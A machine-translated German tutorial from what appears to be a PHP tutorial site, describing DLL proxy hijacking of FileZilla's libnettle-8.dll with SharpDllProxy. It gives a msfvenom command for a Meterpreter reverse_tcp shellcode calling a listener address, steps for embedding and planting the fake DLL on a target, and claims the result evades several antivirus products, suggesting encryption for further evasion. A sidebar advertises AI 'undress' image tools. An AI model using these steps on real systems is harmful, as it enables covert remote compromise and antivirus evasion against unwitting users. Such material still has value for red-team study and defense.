Betrieb und Instandhaltung
Sicherheit
So führen Sie eine DLL-Proxy-Weiterleitung und eine Weiquan-Analyse durch
So führen Sie eine DLL-Proxy-Weiterleitung und eine Weiquan-Analyse durch
DLL-Hijacking
Nach der Windows 7-Version verwendet das System KnowDLLs zum Verwalten von DLLs, die sich unter der Registrierung HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerKnownDLLs befinden kann nur aus dem Systemverzeichnis (System32) aufgerufen werden. Der Grund für das DLL-Hijacking liegt darin, dass nicht alle DLLs in die Registrierung geschrieben werden.
Verwenden Sie die von msfvenom generierte DLL, um direkt zu töten. 
SharpDllProxy
Der Name klingt, als wäre er wahrscheinlich einem Socken-Proxy ähnlich. Tool-Quelle von: https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/. Informationen zur spezifischen Implementierung finden Sie auch im Blog dieses Chefs.
Vorwort
Verstehen Sie zunächst das Funktionsprinzip der dynamischen Linkbibliothek. Wenn Anwendung A die Funktion GetFunkyData() in der Dynamic Link Library DataFunctions.dll verwenden möchte, muss sie die Dynamic Link Library DataFunctions.dll laden. Dieses Tool basiert auf dieser Überlegung. Es erstellt eine dynamische Linkbibliothek mit demselben Namen wie DataFunction.dll. Es verfügt über zwei Funktionen: ① Erstellen Sie eine Tastenkombination, um alle Funktionen an die echte dynamische Linkbibliothek DataFunctions.dll weiterzuleiten der Ursprung des Proxys im Namen; ② Schreiben Sie Shellcode in diese gefälschte DataFunctions.dll. Im Anhang finden Sie das Originalbild des Autors: 
Experimenteller Prozess
Zielprogramm
Es hat einige Zeit gedauert, dieses Experiment durchzuführen. Wie findet man beispielsweise bei der FileZilla-Software die DLL, die geladen werden muss? Wie der Autor sagte: Kopieren Sie die Software und Sie werden wissen, was ihr fehlt. Wie folgt: 
Das bedeutet, dass die DLL-Datei geladen werden muss, um die Anwendung auszuführen. Erstellen Sie also eine gefälschte libnettle-8.dll für diese DLL.
Shellcode generieren
<br>
<br>
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.29 LPORT=4444 -f raw > shell.bin
Das Experiment beginnt
Erster Download von SharpDllProxy: https: / / github.com/Flangvik/SharpDllProxy, und verwenden Sie dann Visual Studio 2019 zum Kompilieren, da ich seit langem Visual Studio 2017 verwendet und verschiedene Fehler gemeldet habe.
Verwenden Sie SharpDllProxy direkt unter vs, um die Datei zu öffnen -> Lösung generieren
Verwenden Sie SharpDllProxy.dll, um eine gefälschte libnettle-8.dll-Datei zu erstellen. Platzieren Sie „shell.bin“ und die DLL, die gefälscht werden muss, in der Datei im Bild oben. Führen Sie den folgenden Befehl aus: .SharpDllProxy.exe --dll libnettle-8.dll --payload shell.bin
Die generierte Datei enthält eine C-Datei und eine DLL. Diese DLL-Datei ist die ursprüngliche libnettle-8.dll-Datei. 
Lassen Sie uns dieses C-Sprachprogramm analysieren. Von Zeile 9 bis Zeile 494 werden alle Funktionen, die ausgeführt werden müssen, an die ursprüngliche DLL weitergeleitet. 
In Zeile 497 haben wir den Shellcode eingefügt. Dies ist der einzige Schlüsselcode. Tatsächlich können Sie den Shellcode „shell.bin“ auch direkt in die Datei schreiben, wodurch die Anzahl verdächtiger Dateien verringert wird. Hier lesen und führen wir den Shellcode im Binärmodus durch die VirtualAlloc-Speicheroperation aus. An diesem Punkt können Sie wie ein Tiger agieren und verschiedene Anti-Kill-Haltungen verwenden, z. B. die Lademethode ändern, z. B. zuerst den Shellcode verschlüsseln und ihn dann zum Ausführen entschlüsseln. 
Verwenden Sie VS, um die obige C-Datei zu kompilieren. Wählen Sie im Menü „Datei“ die Option „Neu“ aus, wählen Sie dann „Dynamic Link Library Project“ aus und nennen Sie das Projekt „libnettle-8“. Kopieren Sie den obigen C-Dateicode zum Kompilieren in VS
Senden Sie die oben genannten drei Dateien (tmpD475.dll, libnettle-8.dll, shell.bin) an das Zielsystem. Verwenden Sie msf zum Abhören und führen Sie dann das Programm aus, um zur Sitzung zurückzukehren. 
Bei Verwendung der am häufigsten verwendeten Antivirensoftware: 360, Tinder und Safe Manager wurden nicht erkannt. 
Das obige ist der detaillierte Inhalt vonSo führen Sie eine DLL-Proxy-Weiterleitung und eine Weiquan-Analyse durch. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!
Heiße KI -Werkzeuge
Undresser.AI Undress
KI-gestützte App zum Erstellen realistischer Aktfotos
AI Clothes Remover
Online-KI-Tool zum Entfernen von Kleidung aus Fotos.
Undress AI Tool
Ausziehbilder kostenlos
Clothoff.io
KI-Kleiderentferner
AI Hentai Generator
Erstellen Sie kostenlos Ai Hentai.
Heißer Artikel
Heiße Werkzeuge
Notepad++7.3.1
Einfach zu bedienender und kostenloser Code-Editor
SublimeText3 chinesische Version
Chinesische Version, sehr einfach zu bedienen
Senden Sie Studio 13.0.1
Leistungsstarke integrierte PHP-Entwicklungsumgebung
Dreamweaver CS6
Visuelle Webentwicklungstools
SublimeText3 Mac-Version
Codebearbeitungssoftware auf Gottesniveau (SublimeText3)
Heiße Themen
1377
52
Nvgpucomp64.dll führt zum Absturz von Windows-PC-Spielen;
Mar 26, 2024 am 08:20 AM
Wenn Nvgpucomp64.dll dazu führt, dass Ihr Spiel häufig abstürzt, können Ihnen die hier bereitgestellten Lösungen helfen. Dieses Problem wird normalerweise durch veraltete oder beschädigte Grafikkartentreiber, beschädigte Spieledateien usw. verursacht. Das Beheben dieser Probleme kann Ihnen dabei helfen, Spielabstürze zu beheben. Die Datei Nvgpucomp64.dll ist mit NVIDIA-Grafikkarten verknüpft. Wenn diese Datei abstürzt, stürzt auch Ihr Spiel ab. Dies geschieht normalerweise in Spielen wie LordsoftheFallen, LiesofP, RocketLeague und ApexLegends. Nvgpucomp64.dll stürzt Spiele auf Windows-PCs ab, wenn N
Analyse des Problems, dass die Datei CoreMessaging.dll im Windows-Systemverzeichnis fehlt
Feb 11, 2024 pm 11:42 PM
Viele Benutzer werden darauf hingewiesen, dass coremessaging.dll fehlt, wenn sie ihre Computer zum Spielen verwenden. Ich glaube, dass viele Benutzer sofort denken, dass ein Problem mit der Software oder dem Spiel vorliegt Wenn auf dem Computer die DLL-Datei fehlt, können Benutzer die Datei coremessaging.dll herunterladen. Lassen Sie diese Site den Benutzern die Analyse des Problems, dass die Datei CoreMessaging.dll im Windows-Systemverzeichnis fehlt und nicht gefunden werden kann, sorgfältig vorstellen. Analyse des Problems, dass die Datei CoreMessaging.dll im Windows-Systemverzeichnis fehlt und nicht gefunden werden kann 1. Laden Sie die Datei CoreMessaging.dll herunter 2.
Wie kann das Problem der fehlenden libcurl.dll im Win7-System gelöst werden? Win7 kann die Dateilösung libcurl.dll nicht finden
Feb 12, 2024 am 08:15 AM
Wie kann das Problem der fehlenden libcurl.dll im Win7-System gelöst werden? Im Allgemeinen führen DLL-Dateien dazu, dass einige Programme nicht normal verwendet werden können. Viele Benutzer wissen nicht, wie sie es lösen können. Als Reaktion auf diese Situation wird der Editor heute eine detaillierte Lösung mit den meisten Benutzern teilen Ich hoffe, dass Win7 heute einer großen Anzahl von Benutzern helfen kann. Lösung für fehlende libcurl.dll im Win7-System 1. Laden Sie die Datei libcurl.dll herunter. 2. Legen Sie die Datei nach dem Herunterladen in den entsprechenden Ordner. Die Pfade für 32-Bit- und 64-Bit-Betriebssysteme lauten wie folgt: Für 32-Bit-Win7-Betriebssysteme kopieren Sie die Datei direkt nach C:\Windows\SYSTEM32
Was tun, wenn Win7 beim Starten des Spiels meldet, dass Skidrow.dll auf dem Computer fehlt?
Feb 15, 2024 pm 02:12 PM
Viele Benutzer verwenden gerne Computer zum Spielen. Vor kurzem haben einige Benutzer von Win7-Systemen berichtet, dass sie beim Starten des Spiels auf ein Popup-Fenster mit der Meldung gestoßen sind, dass die Datei Skidrow.dll auf dem Computer fehlt und nicht gestartet werden kann Das Spiel kann nicht normal geladen werden. Als Antwort auf dieses Problem bietet dieser Artikel eine detaillierte Lösung, die Sie mit allen teilen können. Werfen wir einen Blick darauf. Was soll ich tun, wenn ich beim Starten des Spiels unter Win7 die Meldung bekomme, dass Skidrow.dll auf meinem Computer fehlt? 1. Laden Sie die Skidrow.dll-Datei herunter. 2. Entpacken Sie den Ordner und kopieren Sie die Datei Skidrow.dll in das Systemverzeichnis. 32-Bit-Systeme: C:\WINNT\System 324-Bit-Systeme: C:\Windows\SysWOW
Was soll ich tun, wenn vcruntime140_1.dll den Code nicht weiter ausführen kann?
Feb 11, 2024 pm 05:00 PM
vcruntime140_1.dll ist eine Komponente der Visual C-Laufzeitbibliothek. Bei vielen Benutzern ist der Fehler aufgetreten, dass vcruntime140_1.dll bei der Entwicklung mit Microsoft Visual Studio nicht weiter ausgeführt werden kann. Lassen Sie diese Website den Benutzern sorgfältig vorstellen, wie sie das Problem lösen können, dass vcruntime140_1.dll den Code nicht weiter ausführen kann. Gründe, warum vcruntime140_1.dll verloren geht Deinstallation der VisualC-Laufzeitbibliothek: Fehlbedienung oder Aktualisierung von VisualC führen zum Verlust der Laufzeitbibliothek. Virusinfektion: Malware löscht oder beschädigt vc
Was tun, wenn das Laden der DLL fehlschlägt?
Jan 25, 2024 pm 05:51 PM
Lösung: 1. Laden Sie die DLL-Datei erneut herunter oder beziehen Sie sie von einer zuverlässigen Quelle. 3. Stellen Sie sicher, dass Sie die richtige DLL-Version verwenden 6. Kontaktieren Sie den Softwarelieferanten oder den technischen Support.
Wie repariert Master Lu DLL-Dateien? Master Lus Ein-Klick-Tutorial zum Reparieren fehlender DLLs
Mar 14, 2024 pm 07:31 PM
Master Lu ist ein von vielen Benutzern verwendetes Hardware-Erkennungstool, das über die Software angezeigt werden kann, aber es verfügt über viele Funktionen, mit denen mehrere Treiber repariert werden können. Viele Leute möchten wissen, ob Master Lu DLL-Dateien reparieren kann. Wie lässt sich das Problem beheben? Der Herausgeber dieses Software-Tutorials wird es Ihnen gerne erklären. Tutorial zur Ein-Klick-Reparatur aller fehlenden DLLs durch Master Lu: 1. Öffnen Sie zunächst Master Lu und rufen Sie die Hauptoberfläche auf. 2. Klicken Sie als Nächstes auf die Spielebibliothek in der oberen rechten Ecke und dann auf Reparieren in der oberen rechten Ecke. 3. Der letzte Schritt besteht darin, die fehlende DLL-Datei zu reparieren.
Verstehen Sie die Rolle von VCRUNTIME140.dll
Dec 23, 2023 pm 11:17 PM
Was für eine Datei ist VCRUNTIME140.dll? Warum verliert der Computer beim Ausführen einiger Spiele die Datei VCRUNTIME140.dll und das Spiel kann dann nicht ausgeführt werden? Diese DLL-Datei ist eine wichtige Laufzeitbibliotheksdatei des Computers. Bei Verlust können viele Programme nicht mehr ausgeführt werden. Was ist VCRUNTIME140.dll? Es handelt sich um eine der Dateien in der VC++2015-Laufzeitbibliothek 1. VCRUNTIME140.dll ist eine wichtige Datei, die für den Betrieb des Microsoft Windows-Systems erforderlich ist. 2. Verschiedene Programme auf dem Computer benötigen unterschiedliche DLL-Dateien, um ihren Betrieb zu unterstützen. 3. Wenn der Computer das Programm ausführt, erscheint eine Meldung, dass die Datei VCRUNTIME140.dll fehlt.
